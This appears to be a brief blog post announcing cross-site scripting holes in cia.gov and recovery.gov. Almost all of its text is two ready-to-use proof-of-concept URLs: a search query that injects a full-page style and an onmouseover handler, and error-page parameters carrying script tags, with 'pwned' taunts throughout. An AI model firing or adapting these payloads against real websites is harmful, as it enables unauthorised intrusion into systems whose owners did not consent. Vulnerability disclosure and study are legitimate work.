CIA.gov and Recovery.gov XSS

https://www.cia.gov/search?q="%20style%3d"position:absolute;top:-100px;left:-100px;width:10000px;height:10000px;z-index:999;"%20onmouseover%3d"alert(/pwn3d/)

http://www.recovery.gov/_layouts/1033/Recovery500.aspx?errorurl=<script>alert('and pwned again')</script>&error=<script>alert('pwned')</script>

2 thoughts on “CIA.gov and Recovery.gov XSS”

Leave a Reply

Your email address will not be published. Required fields are marked *